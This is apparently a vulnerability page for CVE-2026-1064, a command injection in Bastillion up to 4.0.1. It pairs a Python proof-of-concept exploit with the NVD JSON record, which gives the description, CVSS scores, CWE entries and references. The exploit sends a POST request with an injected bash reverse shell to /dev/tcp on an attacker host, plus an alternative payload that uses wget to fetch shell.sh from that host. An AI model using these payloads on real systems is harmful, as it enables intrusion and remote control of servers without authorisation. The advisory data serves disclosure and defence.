CVE-2026-1064

import requests import json # CVE-2026-1064 PoC - Bastillion Command Injection # Target: Bastillion <= 4.0.1 # Component: SystemKtrl.java (System Management Module) TARGET_URL = "http://target.com/bastillion" ATTACKER_IP = "attacker.com" ATTACKER_PORT = "4444" def exploit_cve_2026_1064(): """ Exploit for CVE-2026-1064: Command Injection in Bastillion SystemKtrl.java Attack Vector: POST request to SystemKtrl endpoint Required: High privilege account authentication Payload: Command injection via system management parameters """ # Construct malicious payload with reverse shell command # Inject command: bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 payload = { "action": "executeCommand", "systemId": "1", "command": ";bash -i >& /dev/tcp/" + ATTACKER_IP + "/" + ATTACKER_PORT + " 0>&1 #" } # Alternative payload using backticks for command injection alt_payload = { "action": "executeCommand", "systemId": "1", "command": "`wget http://" + ATTACKER_IP + "/shell.sh`" } try: # Send exploit request response = requests.post( TARGET_URL + "/api/system/execute", json=payload, verify=False, timeout=10 ) print(f"[*] Payload sent to {TARGET_URL}") print(f"[*] Response status: {response.status_code}") if response.status_code == 200: print("[+] Exploit sent successfully") print("[*] Check for reverse shell on " + ATTACKER_IP + ":" + ATTACKER_PORT) else: print("[-] Exploit may have failed") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2026-1064 - Bastillion Command Injection PoC") print("=" * 60) exploit_cve_2026_1064()

{"cve": {"id": "CVE-2026-1064", "sourceIdentifier": "[email protected]", "published": "2026-01-17T21:15:49.693", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in bastillion-io Bastillion up to 4.0.1. This issue affects some unknown processing of the file src/main/java/io/bastillion/manage/control/SystemKtrl.java of the component System Management Module. Performing a manipulation results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en bastillion-io Bastillion hasta 4.0.1. Este problema afecta un procesamiento desconocido del archivo src/main/java/io/bastillion/manage/control/SystemKtrl.java del componente Módulo de Gestión del Sistema. Realizar una manipulación resulta en inyección de comandos. El ataque puede iniciarse de forma remota. El exploit se ha hecho público y podría usarse. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/AnalogyC0de/public_exp/blob/main/archives/Bastillion/report2.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.341632", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.341632", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.731308", "source": "[email protected]"}]}}